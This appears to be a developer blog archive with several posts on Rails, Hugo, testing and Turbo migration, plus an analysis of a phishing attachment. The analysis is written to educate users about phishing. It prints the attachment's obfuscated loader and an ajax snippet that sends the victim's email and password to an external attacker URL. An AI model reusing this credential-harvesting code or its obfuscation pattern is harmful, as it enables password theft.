Esnaf
Go and see the product at https://esnaftoys.com/products/nordic-fox-wooden-magnetic-toy-design
This article is about a UI message in our platform that was confusing enough to prevent us from resolving a five-day downtime on a feature. We could have resolved it much faster, but the confusing message made things worse. I hope that UI experts and engineers (like us) can benefit and get an insight into how some things are confusing to users.
Our https://www.buildin3d.com service for visualizing animated and interactive 3D assembly instructions is used by one of the well known robotics education platforms https://www.fllcasts.com. At FLLCasts there are instructions of LEGO robots and mission models from the FIRST LEGO League robotics competitions. Here is an example instruction – https://www.fllcasts.com/materials/1393-bag-12-helicopter-with-food-package-first-lego-league-2021-2022-cargo-connect
5 days ago a user wrote a ticket to us with a question:
“Why can’t I download the instructions?”.
I naturally responded to the user: "Well, you can't, because this is how we've built them to work. They are opened in the browser and cannot be downloaded. What are you trying to do anyway?" (oh, my ignorance)
The user replied in the ticket
“I just want to build them.”
Obviously there was a great miscommunication between us. The user was trying to build the instructions, but was using the term “Download”. Why? Well, because we taught them so.
5 days later I found out the following. Some of the instructions were not working. When users visited them we, as "ignorant engineers", showed a message that said "Downloading initial steps…" while the instruction was loading. In our engineering minds we really were downloading the instruction to the browser: some of the steps of the instruction were downloaded from the server to the client, which is the browser.
When the user got in touch with us he said: "Hey, why can't I download the instructions?"
When asked this question, I assumed the user wanted to download the instructions to their file system and open them from there in offline mode, which is generally what "Download" means. I made a really wrong assumption about what the user was trying to do. He was trying to load and view the instructions, not to "Download" them. But we were telling users that we were "Downloading" the instructions, so they naturally used this term.
For 5 days about 5-6% of our instructions were not working correctly. We could have resolved this the right way if I had paid a little more attention to what the user was asking in the ticket, or if the message had been "Loading initial steps…" instead of "Downloading initial steps…"
You learn something every day.
Today I put on my "new to Rails" hat and decided to start a new Rails 7 project, using two of the new sharp knives that come with Rails 7 to get a job done.
The Job To Be Done is: Demonstrate Bootstrap 5 examples of a Toast in a Rails 7 project.
This is a simple example of a popular Bootstrap 5 component that has both css and js involved. My goal is to build a website that will show a button and when the button is clicked a Toast will be visualised as it is in https://getbootstrap.com/docs/5.0/components/toasts/#live
These are two points of the Rails doctrine. The menu is omakase, which means we get good defaults for the tools we use. We are also given sharp knives to use – cssbundling-rails, jsbundling-rails, Stimulus, dart-sass, esbuild.
I would like to bundle bootstrap 5 in the application. One of the options is to take bootstrap from npm and I would like to demonstrate how we bundle bootstrap from npm. Note that this might not be the right choice for you.
Make sure you have npm 7.1+. I spent more than an hour chasing an error only to find that my npm version was 6.x.
$ npm --version
# We pass in the option --css bootstrap that will configure most things for us
$ rails _7.0.1_ new bProject --css bootstrap
# enter the project folder
$ cd bProject
Everything is installed. You have all the dependencies for bootstrap, and there is a node_modules folder containing modules like bootstrap.
The cssbundling-rails gem is added to the Gemfile by default.
There is an app/assets/stylesheets/application.bootstrap.scss that imports the bootstrap css.
Its content is:
@import 'bootstrap/scss/bootstrap';
We will be using sass (again from npm) to build this .scss file. There is a script in package.json:
{
"name": "app",
"private": "true",
"dependencies": {
"@hotwired/stimulus": "^3.0.1",
"@hotwired/turbo-rails": "^7.1.0",
"@popperjs/core": "^2.11.2",
"bootstrap": "^5.1.3",
"esbuild": "^0.14.11",
"sass": "^1.48.0"
},
"scripts": {
"build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
"build:css": "sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules"
}
}
The script build:css will take the app/assets/stylesheets/application.bootstrap.scss and will produce an app/assets/builds/application.css
The file application.css is the one that our application will be using. It is referenced in application.html.erb as
<%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
<!DOCTYPE html>
<html>
<head>
<title>BProject</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<%= csrf_meta_tags %>
<%= csp_meta_tag %>
<%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
<%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
</head>
<body>
<%= yield %>
</body>
</html>
In order to change the css and live reload it, we must start sass with the --watch option as
$ sass ./app/assets/stylesheets/application.bootstrap.scss ./app/assets/builds/application.css --no-source-map --load-path=node_modules --watch
but don't run this manually; there is a helper script, ./bin/dev, that we will use at the end of the article.
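For reference, ./bin/dev uses foreman to run the processes defined in Procfile.dev. In the project generated here the file looked roughly like this (the exact contents depend on the gem versions, so treat it as a sketch):
# Procfile.dev
web: bin/rails server -p 3000
js: yarn build --watch
css: yarn build:css --watch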
jsbundling-rails is installed in the Gemfile.
There is an app/javascript/application.js that imports bootstrap
// Entry point for the build script in your package.json
import "@hotwired/turbo-rails"
import "./controllers"
import * as bootstrap from "bootstrap"
The application.js is bundled with esbuild, and the command is in package.json:
# part of package.json
"build": "esbuild app/javascript/*.* --bundle --sourcemap --outdir=app/assets/builds",
The result is produced in app/assets/builds
The result is picked up by the Rails asset pipeline and included in the HTML by calling javascript_include_tag "application" as in
<!DOCTYPE html>
<html>
<head>
<title>BProject</title>
<meta name="viewport" content="width=device-width,initial-scale=1">
<%= csrf_meta_tags %>
<%= csp_meta_tag %>
<%= stylesheet_link_tag "application", "data-turbo-track": "reload" %>
<%= javascript_include_tag "application", "data-turbo-track": "reload", defer: true %>
</head>
<body>
<%= yield %>
</body>
</html>
Next, create the initial controller that will serve the home screen containing the button.
# app/controllers/home_controller.rb
$ echo '
class HomeController < ApplicationController
def index
end
end
' > app/controllers/home_controller.rb
# views folder
$ mkdir app/views/home
The view we create next contains a button and a toast.
$ echo '
<!-- app/views/home/index.html.erb -->
<h1>Title</h1>
<div data-controller="toast">
<button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
</div>
<div class="position-fixed bottom-0 end-0 p-3" style="z-index: 11">
<div id="liveToast" class="toast hide" role="alert" aria-live="assertive" aria-atomic="true">
<div class="toast-header">
<strong class="me-auto">Bootstrap</strong>
<small>11 mins ago</small>
<button type="button" class="btn-close" data-bs-dismiss="toast" aria-label="Close"></button>
</div>
<div class="toast-body">
Hello, world! This is a toast message.
</div>
</div>
</div>
' > app/views/home/index.html.erb
Note the code:
<div data-controller="toast">
<button type="button" class="btn btn-primary" data-action="click->toast#show">Show live toast</button>
</div>
Here we have a 'data-controller' attribute on the div element and a 'data-action' attribute on the button element.
This is how we connect Stimulus, the JavaScript framework that will handle the logic for clicking on this button.
When we open “/” we want Rails to call the home#index method that will return the index.html.erb page.
$ echo '
# config/routes.rb
Rails.application.routes.draw do
# Define your application routes per the DSL in https://guides.rubyonrails.org/routing.html
# Defines the root path route ("/")
root "home#index"
end' > config/routes.rb
We will use Stimulus, the small preferred framework in Rails for doing JavaScript. When the button in the above HTML fragment is clicked, the show() method in the controller will be called.
# Use the helper method to generate a stimulus controller
$ bin/rails generate stimulus toast
# create the content of the controller
$ echo '
// app/javascript/controllers/toast_controller.js
import { Controller } from "@hotwired/stimulus"
import { Toast } from "bootstrap"
// Connects to data-controller="toast"
export default class extends Controller {
connect() {
}
show() {
const toastElement = document.getElementById("liveToast")
const toast = new Toast(toastElement)
toast.show();
}
}
' > app/javascript/controllers/toast_controller.js
$ ./bin/dev
Open the app in the browser: there is a button, and when it is clicked a toast appears.
Have you ever been on a support call with a service/vendor and they tell you – “Please, clear your browser cache!”
Or you’ve been on the development side of a website and you upload a new image on your website only for users to continue reporting that they still see the old image. Then you have to ask all of your users to refresh their browser, which is not an easy thing to do.
It’s a classic challenge with caching of assets like images and it generally has only one solution working in all cases.
Recently we had the same challenge with the new website at BeMe.ai and I thought: "Let's explore a tool from the perspective of this challenge". The tool is a static website generator called Hugo, and the job to be done is to address the image caching challenge so that the parents of autistic children who use our website always see the latest image developed by our illustrator, Antonio.
In this article I will go through what the challenge is, why there is a caching challenge, how it could be addressed without any framework, with Rails (Ruby on Rails) and with Hugo. My hope is to give you a good understanding of how the Hugo team thinks, in what terms and in what direction. This is not a Hugo tutorial, but more how I’ve focused on one challenge and tried to address it with Hugo.
When browsers visualise a webpage with images they request the images from the server where the website is hosted. Images require much more bandwidth than text. Next time you visit the same website the browser will request the same image, which will again require traffic. Images do not change often on websites, so browsers prefer to cache them – which means they are saved in the local storage of your device, be it mobile or desktop. Next time you as a user open the same webpage, the browser will not make a request to the server to get the same image, as there is a copy of it already in your local storage.
The question here is how does the browser know that the image it has in its local storage is the same image as the one that is on the server? What if you've changed the image in the meantime and there is a new version on the server? It happened to us with an image that Antonio developed.
The answer is remarkably simple: The browser knows if the image in its local storage and the image on the server are the same if they have the same “url/name”.
Let me illustrate a scenario
A week ago:
A parent visited our website. The browser visualised the image called parent-with-child.png.
It stored a copy of parent-with-child.png in its local storage.
Two days ago:
Antonio developed a new image of the parent and the child and we uploaded it to BeMe.ai. From that moment the image located at parent-with-child.png is the second version.
Today:
The same parent visits the website again. The browser asks the server what's on the page, and the server responds that the page contains a link to parent-with-child.png. As the browser already has a local copy of parent-with-child.png, it will not request this resource from the server; it will just use the local copy. This saves bandwidth and the site opens faster. It's a better experience, but it is the old image.
Which one will be shown to the user?
What really makes this problem difficult is the fact that different browsers will behave in different ways. The internet has tried many different solutions including different headers in the HTTP protocol to address this challenge. Still, there are times when the user will just not see the new version of the image. It could drive you really crazy as it will be some users seeing the new version and some seeing the old.
Technically it is not a great challenge, yet I've seen experienced engineers miss this small detail. I've missed it a couple of times. Every such case is a load on the support channel of your organisation and on engineering, so it is better to avoid caching issues altogether.
There are many solutions. There is only one that works across all browsers and devices and across all versions of the HTTP protocol that power the internet.
The solution is remarkably simple:
The browser will look at the URL of the image. If there is a local copy stored for this URL, the browser will use the local copy. If there is no local copy for the URL the browser will request the new image.
All we have to do is upload the image with a new file name next time we change parent-with-child.png. Probably parent-with-child-v2.png is a good new name.
Any other name works too, as long as it is unique.
All it takes to resolve the browser caching challenge is to change the name of the picture when you upload it and to change it to something unique.
That’s all it takes – no need for frameworks and fingerprinting and assets precompilation and all the other things that follow in the article.
All it takes to address and successfully resolve any browser image caching issue is to change the name of the image next time you upload a new version of it.
So why does this simple solution not work in practice? Because we are humans and we forget. We create a new version of the parent-with-child.png image and we forget to change its name. That's it. We just forget.
Computers, on the other hand, are good at reminding us of things and at doing the dull work that we often forget to do. What we could ask the computer to do is to create a new name for the image every time we upload a new version. Enter fingerprinting.
Fingerprinting is the process of looking at the bits of the image (or generally any file) and calculating a checksum. The checksum will be unique for every file. After we calculate the checksum we add the checksum to the name of the file.
Example: parent-with-child.png becomes parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png.
How checksums are calculated is a topic for another article. Computers are good and fast at calculating checksums. Humans are terrible; it would probably take us days of manual calculation to come up with the checksum of an image file by hand.
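A minimal sketch of the idea in Ruby (the file names here are just for illustration):
require "digest"
require "fileutils"

# Calculate the SHA-256 checksum of the image and build the fingerprinted name.
original = "parent-with-child.png"
checksum = Digest::SHA256.file(original).hexdigest
fingerprinted = "parent-with-child-#{checksum}.png"

# Copy the file under its new, unique name so browsers treat it as a new resource.
FileUtils.cp(original, fingerprinted)
puts fingerprinted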
The difficult part is not the fingerprinting part. What’s difficult is finding every HTML page on your website where the image
parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png is used and replacing this name with parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png.
This means that every occurrence on the website of
<img src="https://www.beme.ai/images/parent-with-child-a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"></img>
should be updated to contain the new url
<img src="https://www.beme.ai/images/parent-with-child-cdc72fa95ca711271e9109b8cab292239afe5d1ba3141ec38b26d9fc8768017b.png"></img>
The good thing is that computers are also good at this – searching through the content of many files and replacing specific parts of this file with new content.
What we need from our process of deploying new versions of images to our website is the following: calculate a fingerprint for every image, add it to the file name, and update every page that references the image.
Linux provides simple tools such as sha256sum, grep, sed and mv, and with a combination of them we can come up with a pretty decent solution. I am not going to do that, because we might decide it is a good idea, and that might take us down a path where we are reinventing the wheel with different bash scripts all over the infrastructure and code. There is no need to do this. If you are already on this path I cannot stop you, but I don't want to be the one guiding you down it. Been there, done that, and after many years I realised it was not a very wise decision.
I am a big fan of Rails. Rails addresses the browser image caching challenge with something called the "Asset Pipeline".
What we do in Rails is use the image_tag method in all HTML pages. The syntax below is an ERB template, where we use <% %> tags inside the HTML that are processed on the server side.
<div class="container">
<!-- Logo -->
<%= link_to image_tag("logo.png", alt: "BeMe.ai", class: "img-fluid", width:55), main_app.root_path,{ class: "navbar-brand" }%>
<!-- End Logo -->
Note that here we use just the name "logo.png" and the image_tag method handles everything for us. The rendered HTML is:
<div class="container">
<a class="navbar-brand" href="/"><img alt="BeMe.ai" class="img-fluid" width="55" src="/assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png"></a>
Note how the file that we referred to as logo.png in the template now becomes /assets/logo-60ffa36d48dfd362e6955b36c56058487272e3030d30f0b6b40d226b8e956a2b.png in the HTML delivered to the client.
Rails has done everything for us – fingerprinting and replacing. Thanks to the Asset Pipeline in Rails we've successfully resolved the browser image caching challenge.
Hugo is different from Rails. Hugo is a static website generator and it thinks in terms different from Rails. Yet, it has a Hugo Pipeline. Before we enter into the Hugo Pipeline it is good to have a small introduction to Hugo.
Hugo thinks about the authors. It makes it possible to include team members in developing the content of the website, and they do not have to be team members who know how to start and deploy Rails applications. Which is good.
This means that authors could create a markdown document like this
# Basic misconceptions about autism
In this blog post we will talk about basic misconceptions about autism.
Let's start with this picture of an autistic child and a parent
![A parent with an autistic child](parent-and-child.png)
...
Because this is a markdown document, someone with medical knowledge can develop the content; there is no need for someone with both medical and HTML/Rails/web development expertise (and such people are difficult to find).
Now the author has added a new version of the parent-and-child.png image and it again has the name parent-and-child.png. We should somehow ask Hugo to add a fingerprint and replace all the references to the image with a reference to the new image.
In Hugo the content developers write the content in Markdown format. The engineer creates the HTML layouts. Hugo takes the layout and adds the content to it to generate the HTML page that is shown to the user. Every time a Markdown element is converted to HTML, Hugo calls a Markdown render hook. The job of the hook is to convert the Markdown element to HTML. The logic of the hook is implemented in the Go template language, and there are default implementations of the hooks for every Markdown element. We can override the default implementation of the hook that converts the Markdown image of parent-and-child.png to HTML by creating a file layouts/_default/_markup/render-image.html.
Fingerprinting of content images is not enabled by default. We have to be explicit that we want it. The Hugo Pipeline handles the rest with methods like fingerprint.
Here is the content of layouts/_default/_markup/render-image.html
<!-- layouts/_default/_markup/render-image.html -->
{{/* Gets a resource object from the destination of the image, which is parent-and-child.png */}}
{{/* The parent-and-child.png image is specified in the markdown and must be available in the */}}
{{/* assets folder */}}
{{ $image := resources.GetMatch .Destination }}
{{/* Calculate the fingerprint, add it to the name and get the Permalink, which is the full URL of the file */}}
{{ $image := ($image | fingerprint).Permalink }}
<img src="{{ $image }}"/>
When processed Hugo will generate an index.html file that contains:
<img src="http://example.org/parent-and-child.a6e0922d83d80151fb73210187a9fb55ee2c5d979177c339f22cb257dead8a56.png"/>
Image fingerprinting is guaranteed to resolve the browser caching challenge in 100% of the cases.
It is a topic that is often overlooked, both by content developers and engineers.
Without it we often end up with users seeing the wrong images and with us having to tell them to "clear their browser cache and refresh again".
It is easy to address it with many different available tools.
We've looked at how to implement it with:
– Linux
– Rails
– Hugo
Asking users to “clear browser cache” and “refresh a website” is a failure of the process and the engineering organisation. It should not happen, and I am sure we could be better than this.
I tried to do a quick summary for our team about what is coming out of the Epic vs Apple case. After looking at a few different resources, I think the following webinar gives a good understanding of what is happening.
Are you curious about what is inside those phishing emails and how they try to steal your password?
This is the story of what happens when you click on one of the phishing emails that we receive so often. If you’ve ever been curious about how these emails work, and how they look, I will be happy to help without burdening you with tech details.
A couple of days ago our CEO received an email that looked real, but was trying to steal her password for Microsoft Office.
Note: Don’t click on links and email attachments. What I am doing here is demonstrating the content of one of these emails in a controlled sandbox environment.
This is the email. It has an attachment. Looks kind of real.
This is what the attachment looks like:
What could you do:
This file is executable on Microsoft Windows machines. Let's see the content of the file if we open it with a text editor.
A sample of it is:
<script language="javascript">document.write(unescape('%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64...')</script>
This file contains an HTML document. HTML is the format of webpages, and once you click on this file it will open in your web browser and the browser will execute it.
Note: Don’t click on such attachments.
This unescape means that the string
"%0D%0A%20%20%20%20%20%20%20%20%3C%73%63%72%69%70%74%20%73%72%63%3D%27%68%74%74%70%73%3A%2F%2F%63%64..." is encoded.
unescape is a JavaScript function that decodes this encoding. It is technical, but in the end the goal is to make sure this content can be read by all browsers.
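As an illustration of what this decoding does (this Ruby snippet is mine, not part of the phishing file):
require "cgi"

# "%3C%73%63%72%69%70%74" is the percent-encoded form of "<script"
puts CGI.unescape("%3C%73%63%72%69%70%74")
# prints: <script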
The result of unescaping the content looks like:
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/crypto-js.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/aes.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/pbkdf2.js'></script>
<script src='https://cdn.jsdelivr.net/npm/crypto-js@4.1.1/sha256.js'></script>
<script>
function CryptoJSAesDecrypt(passphrase, encrypted_json_string){
var obj_json = JSON.parse(encrypted_json_string);
var encrypted = obj_json.ciphertext;
var salt = CryptoJS.enc.Hex.parse(obj_json.salt);
var iv = CryptoJS.enc.Hex.parse(obj_json.iv);
var key = CryptoJS.PBKDF2(passphrase, salt, { hasher: CryptoJS.algo.SHA256, keySize: 64/8, iterations: 999});
var decrypted = CryptoJS.AES.decrypt(encrypted, key, { iv: iv});
return decrypted.toString(CryptoJS.enc.Utf8);
}
document.write(CryptoJSAesDecrypt('978421099', '{"ciphertext":"E8jA2IVItrQQ0SW+CsN1+bRVk2bXLpW5OefWqfRyHU0qa6qTVv379y5qP2rlaRmdNkpeHJ+5t+szBF\/V7UyFG\/dxUWfgifts\/HvH38XW0qufGiryCqLxx0oo9YYtg8Qq8N1Wqg4tNiuYsdy\/RAneSerZBDpWTwUtiDE6rx6yhRNaYpRMxsUODzToXEoGWfcoFSiSAUY3mA2rhDSNeSe9WxnrMlGxRJ5VedyYDdqz8aQ24s\/Y+nIwE
Here is what happens in the code in simple terms:
There is an encrypted text called "ciphertext", and this ciphertext is decrypted and executed. This happens on the last line of the fragment above.
So the phishing mail contains an attachment, this attachment is 'escaped', and the 'escaped' content is encrypted.
The ciphertext contains a web page that your browser will visualize. It looks like a real web page. It looks like a real Microsoft 365 page.
Here is a screenshot:
Here, where you see "pesho@gmail.com", you would see your personal email.
This makes the page look more real to you.
The summary so far: the phishing email contains an attachment with executable HTML code that is escaped and encrypted, and the encrypted content contains an HTML page that looks like the Microsoft login page.
There is a fragment of the code of the page that looks like this:
count=count+1
$.ajax({
dataType: 'JSON',
url: 'https://sintracoopmn.com.br/process.php',
type: 'POST',
data:{
email:email,
password:password,
detail:detail,
},
This code will send your email and password to the following web address: https://sintracoopmn.com.br/process.php
Let’s try it.
I add the username pesho@gmail.com with password ‘abcd1234’
Note that this will send my username and password to https://sintracoopmn.com.br/process.php, but it will also log me in to my Office 365 account.
So I will not even realise that I was compromised.
What can you do? Add two-factor authentication.
That's the easiest, most secure solution. Add two-factor authentication that will send you an SMS every time you log in or will require you to use an authenticator app.
If you haven't done it already, I would advise you to do it now.
We finally decided it is probably time to try to migrate to jasmine 2.9.1 from 2.3.4
An error started occurring randomly, and before digging in, investigating it, and in the end finding out that it was probably the result of the wrong version, we decided to try to get up to date with jasmine.
The latest jasmine version is 3.x, but 2.9.1 is already a huge step from 2.3.4.
We will try to migrate to 2.9.1 first. The issue is that the moment we migrated, this error appeared:
'beforeEach' should only be used in 'describe' function
It took a couple of minutes, but what we found out is that fixtures are now used in a different way.
Here is the difference and what should be done.
With jasmine 2.3.4, fixture.set could be both in the beforeEach and in the describe:
// This works
// fixture.set is in the describe
describe("feature 1", function() {
fixture.set(`<div id="the-div"></div>`);
beforeEach(function() {
})
})
// This works
// fixture.set is in the beforeEach
describe("feature 1", function() {
beforeEach(function() {
fixture.set(`<div id="the-div"></div>`);
})
})
With jasmine 2.9.1, fixture.set could only be in the describe and not in the beforeEach:
// This does not work as the fixture is in the beforeEach
describe("feature 1", function() {
beforeEach(function() {
fixture.set(`<div id="the-div"></div>`);
})
})
// This does work
// fixture.set could be only in the describe
describe("feature 1", function() {
fixture.set(`<div id="the-div"></div>`);
beforeEach(function() {
})
})
In this article I am making the case that sometimes you just need to run automated tests against the real production and the real systems with real data for real users.
We have a feature on one of our platforms: the user clicks Export, the platform generates a CSV export, zips it, uploads the zip to S3 and sends the user an email with a link to the file.
The question is how do you test this?
When it comes to specs I like to develop automated specs that give me the confidence that I deliver quality software. I am not particularly religious about what kind of spec it is, as long as it gives me confidence and does not stand in my way by being too fragile.
Sometimes these specs are model/unit specs, many times they are system/feature/integration specs, but there are cases where you just need to run a test on production against the production db, production S3, production env, production user, production everything.
A spec that would give me confidence here is to simulate the user behavior with Rails system specs.
The user goes and clicks on Export, and I check that we've received an email and that this email contains a link:
scenario "create an export, uploads it on s3 and send an email" do
# Set up the record
user = FactoryBot.create(:user)
record = FactoryBot.create(:record)
...
# Start the spec
login_as user
visit "/records"
click_on "Export"
expect(page).to have_text "Export successfully scheduled. You will receive an email with a link soon."
mail_html_content = ActionMailer::Base.deliveries.select{|email| email.subject == "Successful export"}.last.html_part.to_s
expect(mail_html_content).to have_xpath "//a[text()='#{export_name}']"
link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
csv_content = read_csv_in_zip_given_my_link link_to_exported_zip
expect(csv_content).not_to be_nil
expect(csv_content).to include user.username
end
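The read_csv_in_zip_given_my_link helper is not shown in the original; a minimal sketch of what such a helper could look like (the name, the single-CSV assumption and the use of open-uri and rubyzip are my assumptions):
require "open-uri"
require "stringio"
require "zip" # rubyzip

# Hypothetical helper used by the spec above: downloads the zip from the
# (presigned) link and returns the content of the first CSV file inside it.
def read_csv_in_zip_given_my_link(link)
  zip_data = URI.open(link).read
  Zip::File.open_buffer(StringIO.new(zip_data)) do |zip|
    entry = zip.glob("*.csv").first
    return entry&.get_input_stream&.read
  end
end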
This spec does not work!
We have a lot of other specs that use the S3 API with stubbed responses. That is a good practice, as you don't want all your specs to touch S3 for real; it is slow and too coupled. But for this spec there was a problem. There was a file uploaded to S3, but the file was empty. The reason was that on one of the machines running the specs there was no 'zip' command. It was not installed, and we use 'zip' to create the zip of the CSV files.
Because of this I wanted to upload an actual file somehow and actually check what is in the file.
I created a spec filter that would start a specific spec with real S3.
# spec/rails_helper.rb
RSpec.configure do |config|
config.before(:each) do
# Stub S3 for all specs
Aws.config[:s3] = {
stub_responses: true
}
end
config.before(:each, s3_stub_responses: false) do
# but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
Aws.config[:s3] = {
stub_responses: false
}
end
end
This allows us to start the spec as:
scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
# Now in this spec S3 is not stubbed and we upload the real file
end
Yes, we could have created a local S3 server, but then the second problem comes.
In the email we are sending a presigned_url to the S3 file as the file is not public.
But the mailer that we were using was adding “utm_campaign=…” to the url params.
This means that the S3 presigned URL was not valid. Checking that there is a URL in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.
This was still not enough.
All the tests were passing with real S3 and a real mailer in the test and development environments, but when I went to production the feature was not working.
The problem was with the configuration. In order to upload to S3 we need to know the bucket. The bucket was configured for test and development but was missing for production:
config/environments/development.rb: config.aws_bucket = 'the-bucket'
config/environments/test.rb: config.aws_bucket = 'the-bucket'
config/environments/production.rb: # there was no config.aws_bucket
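A sketch of the missing line (reading the bucket name from an environment variable is my assumption, not something the original configuration shows):
# config/environments/production.rb
config.aws_bucket = ENV.fetch("AWS_BUCKET")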
The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly was to run the spec against the real production.
Should we run every spec against production like this? Of course not. But there should be a few specs for a few features that test that the buckets have the right permissions, that they are accessible, and that the configuration in production is right. This is what I've added. Once a day a spec runs against production and tests that everything works there with the real S3, real db, real environment and configuration, the same way that users will use the feature.
Is this a replacement for the rest of the test suite? It is not. We do not run this spec before deploy. We run all the other specs before deploy, and they give us 99% confidence that everything works. But for the last percent we run a spec once every day (or after deploy) just to check a real, complex scenario involving the communication between different systems.
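One possible way to wire this up is a small rake task triggered by cron once a day; the task name and the tag below are assumptions for illustration:
# lib/tasks/production_check.rake (hypothetical)
namespace :production_check do
  desc "Run the specs tagged as production checks against the real environment"
  task :run do
    # assumes the production-facing specs are tagged with `production_check: true`
    system("bundle exec rspec --tag production_check") || abort("Production check specs failed")
  end
end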
It pays off.
We recently decided to migrate one of our newest platforms to Turbo. The goal of this article is to help anyone who plans to do the same migration. I hope it gives you a perspective on the amount of work required. Generally it was easy and straightforward, but a few specs had to be changed because of URLs and controller responses.
Remove turbolinks and add turbo-rails. The change was
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -227,9 +227,8 @@ GEM
switch_user (1.5.4)
thor (1.1.0)
tilt (2.0.10)
- turbolinks (5.2.1)
- turbolinks-source (~> 5.2)
- turbolinks-source (5.2.0)
+ turbo-rails (0.7.8)
+ rails (>= 6.0.0)
Added "@hotwired/turbo-rails" and removed Rails.start() and Turbolinks.start().
--- a/app/javascript/packs/application.js
+++ b/app/javascript/packs/application.js
@@ -3,8 +3,7 @@
// a relevant structure within app/javascript and only use these pack files to reference
// that code so it'll be compiled.
-import Rails from "@rails/ujs"
-import Turbolinks from "turbolinks"
+import "@hotwired/turbo-rails"
import * as ActiveStorage from "@rails/activestorage"
import "channels"
@@ -14,8 +13,6 @@ import "channels"
// Collapse - needed for navbar
import { Collapse } from 'bootstrap';
-Rails.start()
-Turbolinks.start()
ActiveStorage.start()
The change in package.json was small:
--- a/package.json
+++ b/package.json
@@ -2,10 +2,10 @@
"name": "platform",
"private": true,
"dependencies": {
+ "@hotwired/turbo-rails": "^7.0.0-rc.3",
"@popperjs/core": "^2.9.2",
"@rails/actioncable": "^6.0.0",
"@rails/activestorage": "^6.0.0",
- "@rails/ujs": "^6.0.0",
"@rails/webpacker": "5.4.0",
"bootstrap": "^5.0.2",
"stimulus": "^2.0.0",
For the Devise forms you have to add data: { turbo: "false" } to disable Turbo for them:
+<%= form_for(resource, as: resource_name, url: password_path(resource_name), html: { method: :post }, data: {turbo: "false"}) do |f| %>;
We are waiting for a resolution of https://github.com/heartcombo/devise/pull/5340
If there are ActiveRecord validation errors in the controller, we must now render with status: :unprocessable_entity:
+++ b/app/controllers/records_controller.rb
@@ -14,7 +14,7 @@ class RecordsController < ApplicationController
if @record.save
redirect_to edit_record_path(@record)
else
- render :new
+ render :new, status: :unprocessable_entity
end
end
The old application.js – 932 KiB:
application (932 KiB)
js/application-dce2ae8c3797246e3c4b.js
The new application.js – 248 KiB
remote: Assets:
remote: js/application-b52f4ecd1b3d48f2f393.js (248 KiB)
Overall a good experience. We are still facing some minor issues with third-party chat widgets like tawk.to that do not work well with Turbo, as they send one more request, refreshing the page and adding the widget to an iframe that is lost on Turbo navigation. But we will probably move away from tawk.to anyway.